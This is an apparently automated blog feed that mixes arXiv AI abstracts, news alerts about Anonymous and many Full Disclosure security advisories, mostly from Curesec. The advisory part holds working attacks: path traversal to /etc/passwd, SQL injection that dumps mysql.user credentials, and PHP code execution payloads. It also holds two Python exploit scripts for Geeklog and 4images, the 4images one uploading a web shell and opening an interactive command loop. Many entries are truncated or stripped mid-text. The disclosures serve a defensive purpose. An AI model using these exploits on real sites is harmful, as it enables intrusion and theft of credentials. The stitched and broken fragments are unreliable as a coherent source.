A fundamental challenge in developing high-impact machine learning technologies is balancing the ability to model rich, structured domains with the ability to scale to big data. Many important problem areas are both richly structured and large scale, from social and biological networks, to knowledge graphs and the Web, to images, video, and natural language. In this paper, we introduce two new formalisms for modeling structured data, distinguished from previous approaches by their ability to both capture rich structure and scale to big data. The first, hinge-loss Markov random fields (HL-MRFs), is a new kind of probabilistic graphical model that generalizes different approaches to convex inference. We unite three approaches from the randomized algorithms, probabilistic graphical models, and fuzzy logic communities, showing that all three lead to the same inference objective. We then derive HL-MRFs by generalizing this unified objective. The second new formalism, probabilistic soft logic (PSL), is a probabilistic programming language that makes HL-MRFs easy to define using a syntax based on first-order logic. We next introduce an algorithm for inferring most-probable variable assignments (MAP inference) that is much more scalable than general-purpose convex optimization software, because it uses message passing to take advantage of sparse dependency structures. We then show how to learn the parameters of HL-MRFs. The learned HL-MRFs are as accurate as analogous discrete models, but much more scalable. Together, these algorithms enable HL-MRFs and PSL to model rich, structured data at scales not previously possible.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1AhkWaY
via IFTTT

Belief and Truth in Hypothesised Behaviours. (arXiv:1507.07688v2 [cs.AI] UPDATED)

There is a long history in game theory on the topic of Bayesian or "rational" learning, in which each player maintains beliefs over a set of alternative behaviours, or types, for the other players. This idea has gained increasing interest in the artificial intelligence (AI) community, where it is used as a method to control a single agent in a system composed of multiple agents with unknown behaviours. The idea is to hypothesise a set of types, each specifying a possible behaviour for the other agents, and to plan our own actions with respect to those types which we believe are most likely, given the observed actions of the agents. The game theory literature studies this idea primarily in the context of equilibrium attainment. In contrast, many AI applications have a focus on task completion and payoff maximisation. With this perspective in mind, we identify and address a spectrum of questions pertaining to belief and truth in hypothesised types. We formulate three basic ways to incorporate evidence into posterior beliefs and show when the resulting beliefs are correct, and when they may fail to be correct. Moreover, we demonstrate that prior beliefs can have a significant impact on our ability to maximise payoffs in the long-term, and that they can be computed automatically with consistent performance effects. Furthermore, we analyse the conditions under which we are able complete our task optimally, despite inaccuracies in the hypothesised types. Finally, we show how the correctness of hypothesised types can be ascertained during the interaction via an automated statistical analysis.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1JQl9k3
via IFTTT

Return of Frustratingly Easy Domain Adaptation. (arXiv:1511.05547v2 [cs.CV] UPDATED)

Unlike human learning, machine learning often fails to handle changes between training (source) and test (target) input distributions. Such domain shifts, common in practical scenarios, severely damage the performance of conventional machine learning methods. Supervised domain adaptation methods have been proposed for the case when the target data have labels, including some that perform very well despite being "frustratingly easy" to implement. However, in practice, the target domain is often unlabeled, requiring unsupervised adaptation. We propose a simple, effective, and efficient method for unsupervised domain adaptation called CORrelation ALignment (CORAL). CORAL minimizes domain shift by aligning the second-order statistics of source and target distributions, without requiring any target labels. Even though it is extraordinarily simple--it can be implemented in four lines of Matlab code--CORAL performs remarkably well in extensive evaluations on standard benchmark datasets.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1WY5345
via IFTTT

Anonymous wants us all to troll ISIS on Friday with hashtag #daeshbags

Anonymous has a job for you: Troll ISIS for one day. ... Anonymous even suggests printing out stickers and posters that mock ISIS and posting them up ...

from Google Alert - anonymous http://ift.tt/1mbkNA1
via IFTTT

Emotions Anonymous Support Group

Emotions Anonymous Support Group. Date: Every Wednesday. Location: Garden City Hospital Campus, Allan Breakie Medical Office Building, Lower ...

from Google Alert - anonymous http://ift.tt/1mbkLrX
via IFTTT

[FD] [CVE-2014-3260] Crypto implementation flaws in Pacom GMS System

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] GoAutoDial CE 3.3 Multiple SQL injections, Command Injection



Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-2 tvOS 9.1

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-6 Xcode 7.2



Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-5 Safari 9.0.2



Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-4 watchOS 2.1

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2015-12-08-1 iOS 9.2



Source: Gmail -> IFTTT-> Blogger

[FD] LG Nortel ADSL modems - Multiple vulnerabilities

[FD] [CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Anonymous hackers declare Friday "Troll ISIS Day"

In an online post to ghostbin.com, Anonymous asked Web users to 'show your support and help against ISIS by joining us and trolling them.'

from Google Alert - anonymous http://ift.tt/1IFpNqN
via IFTTT

Download link token for anonymous users

However incase if I want to make this download link(only one time) available to a anonymous user, via a mail (executed by rules) to the mail-id ...

from Google Alert - anonymous http://ift.tt/1M3DI4z
via IFTTT

[FD] Executable installers are vulnerable^WEVIL (case 9): Chrome's setup.exe allows arbitrary code execution and escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 5): JRSoft InnoSetup

[FD] Executable installers are vulnerable^WEVIL (case 2): NSIS allows remote code execution with escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 8): vlc-*.exe allows remote code execution with escalation of privilege

[FD] Executable installers are vulnerable^WEVIL (case 6): SumatraPDF-*-installer.exe allows remote code execution with escalation of privilege

[FD] Defense in depth -- the Microsoft way (part 37): MMC.exe and DrvInst.exe load and execute ".dll" with elevated resp. SYSTEM privileges

[FD] appRain 4.0.3: Code Execution

[FD] appRain 4.0.3: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: appRain 4.0.3 Fixed in: Fixed via Optional Module CSRF Protection Module http://ift.tt/1OTM6bA Link: =Description Vendor Website: info@apprain.com Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description None of the requests have CSRF protection. This means that an attacker can execute actions for an admin if the admin visits an attacker controlled website while logged in. 3. Proof of Concept Add new Admin:
Code Execution (using the PHP file editor):

[FD] appRain 4.0.3: Path Traversal

Security Advisory - Curesec Research Team 1. Introduction Affected Product: appRain 4.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: info@apprain.com Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode: Full Disclosure CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description The "loc" Parameter of the appeditor is vulnerable to directory traversal, which allows the viewing of arbitrary files. Admin credentials are required to view files. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component. 3. Proof of Concept http://localhost/apprain-source-4.0.3/appeditor?loc=../../../../../../../etc/passwd 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 10/02 Informed Vendor. Mailbox info@apprain.com is full, used /2015 security@apprain.com instead (no reply) 10/21 Reminded Vendor of Disclosure Date /2015 10/21 Vendor anounces fix for 11/02/2015 /2015 11/04 No fix released, extended public disclosure date to 11/11/2015 /2015 11/17 CVE Requested (no reply) /2015 11/24 Reminded Vendor of release date, extended date to 12/02/2015 and offered /2015 extension if needed (no reply) 12/02 Disclosed to public /2015 Blog Reference: http://ift.tt/1OiD4BY

Source: Gmail -> IFTTT-> Blogger

[FD] appRain 4.0.3: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: appRain 4.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: info@apprain.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode: Full Disclosure CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in appRain 4.0.3. This can lead to the injection of JavaScript keyloggers or the bypassing of CSRF protection. In the case of appRain, this may lead to code execution. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description The search of the file manager echoes user input without encoding, leading to reflected XSS. Proof of Concept
" />
Code /apprain/base/modules/toolbar.php private function btnFilemanagerSrcBox($srcstr = "") { $html = '
'; return array('box' => $html); } 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description The appeditor echoes the given file name and path without encoding, leading to reflected XSS. Proof of Concept http://localhost/apprain-source-4.0.3/appeditor?loc='">Code /component/appeditor/controllers/appeditor/index.phtml
  • X
  • 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 10/02 Informed Vendor. Mailbox info@apprain.com is full, used /2015 security@apprain.com instead (no reply) 10/21 Reminded Vendor of Disclosure Date /2015 10/21 Vendor anounces fix for 11/02/2015 /2015 11/04 No fix released, extended public disclosure date to 11/11/2015 /2015 11/05 Vendor asks for list of organizations that may help implementing fixes /2015 11/11 Replied that we do not have lists, and that we do not have the resources /2015 to implement fixes ourselves. Extended release date to 11/18/2015 and offered further extension if needed (no reply) 11/17 CVE Requested (no reply) /2015 11/24 Reminded Vendor of release date, extended date to 12/02/2015 and offered /2015 extension if needed (no reply) 12/02 Disclosed to public /2015 Blog Reference: http://ift.tt/1IFbUbX

    Source: Gmail -> IFTTT-> Blogger

[FD] redaxscript 2.5.0: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: redaxscript 2.5.0 Fixed in: module has been removed in version 2.6.0 Fixed Version Link: n/a Vendor Contact: info@redaxmedia.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The module file_manager allows for file uploads, and uses exif_imagetype to check the validity of the file. By setting the first bytes of the uploaded file to that of a valid image type, an attacker can easily bypass this check and thus upload files of dangerous type. It should be noted that only files with the name index.php will be executed, as access to all other PHP files is forbidden by a htaccess file. An account that has access to the module "File manager" is needed to exploit this issue. 3. Code /modules/file_manager/index.php function file_manager_upload($directory = '') { $file = $_FILES['file']['tmp_name']; $file_name = file_manager_clean_file_name($_FILES['file']['name']); $file_size = $_FILES['file']['size']; /* validate post */ if (function_exists('exif_imagetype')) { if (exif_imagetype($file) == '') { $error = l('file_type_limit', '_file_manager') . l('point'); } } 4. Solution To mitigate this issue please remove the file_manager module. 5. Report Timeline 10/02/2015 Informed Vendor about Issue 11/15/2015 Vendor removes affected module 12/02/2015 Disclosed to public Blog Reference: http://ift.tt/21PDh9D

Source: Gmail -> IFTTT-> Blogger

[FD] Geeklog 2.1.0: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Geeklog 2.1.0 Fixed in: 2.1.1b3 Fixed Version Link: http://ift.tt/1OTKizb Vendor Contact: geeklog-security@lists.geeklog.net Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview The admin area of Geeklog suffers from two vulnerabilities that can lead to code execution: OS Command Injection and Upload of Files with Dangerous Type. The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1, the OS command injection in version 2.1.1b3. 3. Upload of Files with Dangerous Type CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a file, the file type check is performed only client-side. An attacker can easily bypass this check and thus upload files of dangerous types, such as PHP files. To upload files, an attacker needs a registered user that is in the group "Filemanager Admin". Proof of Concept POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Length: 761 Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Geeklog 2.1.0: Code Execution Exploit

#!/usr/local/bin/python # Exploit for geeklog-2.1.0 OS Command Injection vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import argparse import requests # requires requests lib parser = argparse.ArgumentParser() parser.add_argument("url", help="base url to vulnerable site") parser.add_argument("username", help="admin username") parser.add_argument("password", help="admin password") args = parser.parse_args() url = args.url username = args.username password = args.password loginPath = "/admin/moderation.php" configPath = "/admin/configuration.php?tab-5" backupPath = "/admin/database.php" shellFileName = "404.php" shellContent = "

[FD] Geeklog 2.1.0: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Geeklog 2.1.0 Fixed in: 2.1.1b3 Fixed Version Link: http://ift.tt/1OTKizb Vendor Contact: geeklog-security@lists.geeklog.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description There is at least one XSS vulnerability in the installation script of Geeklog. Geeklog recommends to delete the install directory and displays warnings in the admin area if this is not the case. However, deleting the install directory is not mandatory, so it should be assumed that not all users will delete it. 3. Proof of Concept http://localhost/geeklog-2.1.0/public_html/admin/install/bigdump.php?foffset=1&start=1&fn=test.sql $_REQUEST['site_url'], $_REQUEST['site_admin_url'], and $_SERVER['PHP_SELF'] may be vulnerable as well, but the attacker would need a valid sql backup file to trigger them. 4. Solution To mitigate this issue please upgrade at least to version 2.1.1b3: http://ift.tt/1OTKizb Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date 10/21/2015 Vendor asks for an additional two weeks for testing 11/17/2015 CVE Requested (no reply) 11/30/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: http://ift.tt/1OTKlLp

Source: Gmail -> IFTTT-> Blogger

[FD] phpwcms 1.7.9: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: phpwcms 1.7.9 Fixed in: 1.8.0 RC1 Fixed Version http://ift.tt/1lPID3R Link: phpwcms-1.8.0-RC1.zip Vendor Website: http://www.phpwcms.de/ Vulnerability Code Execution Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 12/02/2015 public: Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview phpwcms allows the upload of files with dangerous type, which leads to code execution. Additionally, it allows registered users who are not admins to use PHP tags, which also leads to code execution. Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default (the form to add users is however open to CSRF). 3. Unrestricted Upload of File with Dangerous Type CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading files, there are no checks as to the type or extension of the file. When uploading single files, these are stored inside the "filearchive" directory. The original file name is changed to the hash of the file name. The directory is protected with a .htaccess file from accessing or executing files directly. Because of this, uploading single files can not easily be exploited; it may however be possible to execute them via include_int_php (see below). However, when uploading multiple files, these are stored temporarily inside the "upload" directory, and these files are not renamed. The "upload" directory is also protected by an .htaccess file, but as .htaccess files can be uploaded, it can be overwritten, thus leading to code execution. Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default. Proof of Concept Upload a .htaccess file and a PHP file here: http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=files&p=8 The .htaccess file should contain: allow from all Now the uploaded PHP file can be accessed and executed: http://localhost/phpwcms-phpwcms-1.7.9/upload/shell.php?x=id 4. Code Execution CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The functions include_int_php, include_int_phpcode, and include_ext_php can all be used to gain code execution. These functions can be used by any logged in user, admin rights are not required. Proof of Concept Create a new article. As author, use [PHP] passthru("touch mynewtest.php") [/PHP] Visiting http://localhost/phpwcms-phpwcms-1.7.9/feeds.php is one of the ways to trigger the code execution. Please note that the feed is by default cached for one hour, during which the code would not be executed as the cache is loaded instead. The vulnerable functions are used in other places as well, which means an attacker may not have to wait an hour for the cache to clear by triggering the code elsewhere. 5. Solution To mitigate this issue please upgrade at least to version 1.8.0 RC1: http://ift.tt/1HVaI48 Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor confirmed issues 10/21/2015 Reminded Vendor of Disclosure Date 10/25/2015 Vendor requests more time 11/17/2015 CVE Requested (no reply) 11/24/2015 Reminded Vendor of Disclosure Date 11/29/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: http://ift.tt/1QfE2VN

Source: Gmail -> IFTTT-> Blogger

[FD] phpwcms 1.7.9: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: phpwcms 1.7.9 Fixed in: 1.8.0 RC1 Fixed Version http://ift.tt/1lPID3R Link: phpwcms-1.8.0-RC1.zip Vendor Website: http://www.phpwcms.de/ Vulnerability CSRF Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 12/02/2015 public: Release mode: Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description There is no CSRF protection for any forms, which means that an attacker can perform any action a victim can perform, if the victim visits an attacker controlled website while logged in. In the case of phpwcms, an attacker can add an admin user and thus gain code execution. 3. Proof of Concept Add Admin User:
4. Solution To mitigate this issue please upgrade at least to version 1.8.0 RC1: http://ift.tt/1HVaI48 Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor confirmed issues 10/21/2015 Reminded Vendor of Disclosure Date 10/25/2015 Vendor requests more time 11/17/2015 CVE Requested (no reply) 11/24/2015 Reminded Vendor of Disclosure Date 11/29/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: http://ift.tt/1lPID3T

Source: Gmail -> IFTTT-> Blogger

[FD] CodoForum 3.4: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: CodoForum 3.4 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: admin@codologic.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 12/02/2015 Release mode: Full Disclosure CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There is an XSS vulnerability in CodoForum 3.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers. The HybridAuth 2.1.2 Install script is vulnerable to XSS attacks. In version 3.4, CodoForum did update HybridAuth to the latest version, but kept the old version in a folder called hybridauthold. 3. Proof of Concept http://localhost/codoforum/sys/Ext/hybridauthold/install.php/">4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/23/2015 Vendor requests clarification 09/23/2015 Clarified Issue 09/29/2015 Reminded Vendor of disclosure date 09/29/2015 Vendor requests more time 09/29/2015 Set new disclosure date 11/03/2015 Reminded Vendor of disclosure date (no reply) 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: http://ift.tt/1lPI5es

Source: Gmail -> IFTTT-> Blogger

[FD] 4images 1.7.11: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: 4images 1.7.11 Fixed in: 1.7.12 Fixed Version Link: http://ift.tt/1NMG3Cf Vendor Website: http://ift.tt/XKxPm3 Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/04/2015 Release mode: Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description 4images comes with a HTML Template editor which allows the editing of HTML files. But it will also create a new file if the passed file name does not already exist. When doing this, it does not check that the extension of the passed file is .html. Admin credentials are required to use the HTML template editor. 3. Proof of Concept POST /4images/admin/templates.php HTTP/1.1 __csrf=28a9a05b480c3f8ed326523b1ce7532c&action=savetemplate&content=

[FD] 4images 1.7.11: Code Execution Exploit

#!/usr/local/bin/python # Exploit for 4images 1.7.11 Code Execution vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import argparse import requests # requires requests lib parser = argparse.ArgumentParser() parser.add_argument("url", help="base url to vulnerable site") parser.add_argument("username", help="admin username") parser.add_argument("password", help="admin password") args = parser.parse_args() url = args.url username = args.username password = args.password loginPath = "/admin/index.php" fileManagerPath = "/admin/templates.php" shellFileName = "404.php" shellContent = "" def login(requestSession, url, username, password): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password} loginResult = requestSession.post(url, data = postData).text return "loginpassword" not in loginResult def upload(requestSession, url, fileName, fileContent): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"} loginResult = requestSession.post(url, data = postData).text def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text) command = raw_input("$ ") requestSession = requests.session() if login(requestSession, url + loginPath, username, password): print("successful: login") else: exit("ERROR: Incorrect username or password") upload(requestSession, url + fileManagerPath, shellFileName, shellContent) runShell(url + "/templates/default/" + shellFileName + "?x=") Blog Reference: http://ift.tt/1lPGGEt

Source: Gmail -> IFTTT-> Blogger

[FD] 4images 1.7.11: Path Traversal

Security Advisory - Curesec Research Team 1. Introduction Affected Product: 4images 1.7.11 Fixed in: 1.7.12 Fixed Version Link: http://ift.tt/1NMG3Cf Vendor Website: http://ift.tt/XKxPm3 Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description When downloading or displaying a backup file, the file Parameter is vulnerable to directory traversal. This is the case because the get_basefile function contains a bug. When the passed path name ends with a slash, it will return the entire path instead of the file name. By adding ?/ to the file name, an attacker can thus download or display arbitrary files. Admin credentials are required to view or download backup files. 3. Proof of Concept GET /4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/ HTTP/1.1 GET /4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ HTTP/1.1 4. Code /admin/bachup.php if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) { $file = (isset($HTTP_GET_VARS['file'])) ? get_basefile(trim($HTTP_GET_VARS['file'])) : get_basefile(trim($HTTP_POST_VARS['file'])); } else { $file = ""; } if ($action == "downloadbackup") { $size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file); header("Content-type: application/x-unknown"); header("Content-length: $size\n"); header("Content-Disposition: attachment; filename=$file\n"); readfile(ROOT_PATH.DATABASE_DIR."/".$file); exit; } /includes/functions.php function get_basename($path) { $path = str_replace("\\", "/", $path); $name = substr(strrchr($path, "/"), 1); return $name ? $name : $path; } function get_basefile($path) { $basename = get_basename($path); preg_match("#(.+)\?(.+)#", $basename, $regs); return isset($regs[1]) ? $regs[1] : $basename; } 5. Solution To mitigate this issue please upgrade at least to version 1.7.12: http://ift.tt/1NMG3Cf Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases fix 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: http://ift.tt/1Q0kSDr

Source: Gmail -> IFTTT-> Blogger

[FD] 4images 1.7.11: SQL Injection

Security Advisory - Curesec Research Team 1. Introduction Affected Product: 4images 1.7.11 Fixed in: 1.7.12 Fixed Version Link: http://ift.tt/1NMG3Cf Vendor Website: http://ift.tt/XKxPm3 Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode: Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When backing up the database, the user can supply the tables that should be backed up. The program does not check if these tables actually belong to the 4images database or to a different database. Because of this, it is possible to back up, and thus read, any database the database user has access to. However, even if there were a check for the database, it would still be possible to perform arbitrary SELECT statements by injecting into a SELECT query that looks like this: "SELECT * FROM $table" where $table is user supplied. Admin credentials are required to back up the database. 3. Proof of Concept POST /4images/admin/backup.php HTTP/1.1 __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=mysql.user POST /4images/admin/backup.php HTTP/1.1 __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=4images_comments where comment_id=-1 union all select user,password,3,4,5,6,7,8 from mysql.user 4. Solution To mitigate this issue please upgrade at least to version 1.7.12: http://ift.tt/1NMG3Cf Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases fix 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: http://ift.tt/1Q0kQLZ

Source: Gmail -> IFTTT-> Blogger

[FD] 4images 1.7.12: XSS

[FD] SQLMap Code Execute

Sqlmap Code Execute Team: Knownsec Team Site: http://ift.tt/zNDgKn --[ Contents

Source: Gmail -> IFTTT-> Blogger

[FD] ntop-ng <= 2.0.151021 - Privilege Escalation

ntop-ng Privilege Escalation (CVE-2015-8368) # Product Details: ntop-ng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well. # Vulnerability Details: in the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters. # Vulnerability technical information 1. Login with an unprivileged account 2. Change the account password and intercept the request, modify the username= and Cookie user= and change to the admin account Example: GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1 Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX 3. Login with the admin account and the password you defined in step #2 # Solution Upgrade to ntop-ng 2.2 stable # Advisory timeline 26.11 - Notified ntop security 27.11 - Vulnerability acknowledged, maintainer confirms it also affects the dev branch 28.11 - CVE assigned (CVE-2015-8368) 01.12 - ntop-ng 2.2 released with the fix 04.12 - Full disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] Announcing NorthSec 2016 CFP + Reg - Montreal, May 19-22

www.nsec.io - northsec.eventbrite.ca NorthSec 2016, one of the biggest applied security event in Canada, coming up in Montreal May 19-22, with a 2-day technical conference followed by a 48h on-site CTF. * We are looking for great speakers to submit to our 2016 CFP at http://www.nsec.io/cfp Subjects covered range from Application & Infrastructure security : pentesting, network security, software and/or hardware exploitation, web hacking, reverse engineering, malware/virii/rootkits or anything low-level that makes your personal clock tick ! We also will talk about cryptography & obfuscation, from theoretical cryptosystems to applied cryptography exploitation, cryptocurrencies, steganography and covert communication systems, anything goes ! Society & Ethics issues will be part of the show, since technical subjects are at the core of the security field, but they also exist in a world of humans, affected by their social environment & political context. If you want to exchange great ideas about the digital society and it's security implications, NorthSec's the place ! * Registration for the event is up at http://ift.tt/1EVrqLo -

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2015-8369] Cacti SQL injection in graph.php

Application: Cacti Vendor URL: http://www.cacti.net Bugs: SQL injection Author:changzhao.mao(DBAPPSecurity Ltd) Version affected: 0.8.8f and prior ================================ Introduction ================================ Cacti is a complete frontend to RRDTool, it stores all of the necessary information to create graphs and populate them with data in a MySQL database. The frontend is completely PHP driven. Along with being able to maintain Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the data gathering. There is also SNMP support for those used to creating traffic graphs with MRTG. SQL injection vulnerabilities has been discovered.The vulnerability allows any users to execute own sql commands to compromise the web-applicaation or database management system.The vulnerabilities are located in the rra_id value of the graph.php file.This php file of older version cacti may be accessible anonymously according to the cases I found from the internet. Latest version cacti may require guest user privilege. [Vulnerability info] /cacti-0.8.8f/graph.php line 25 include "./include/top_graph_header.php" before validating rra_id /* set default action */ if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = "view"; } if (!isset($_REQUEST["view_type"])) { $_REQUEST["view_type"] = ""; } $guest_account = true; include("./include/auth.php"); include_once("./lib/rrd.php"); api_plugin_hook_function('graph'); include_once("./lib/html_tree.php"); include_once("./include/top_graph_header.php"); /* ================= input validation ================= */ input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$"); input_validate_input_number(get_request_var("local_graph_id")); input_validate_input_number(get_request_var("graph_end")); input_validate_input_number(get_request_var("graph_start")); input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$"); /* ==================================================== */ /cacti-0.8.8f/include/top_graph_header.php line 30 rra_id is not validated /* ================= input validation ================= */ input_validate_input_number(get_request_var_request("local_graph_id")); 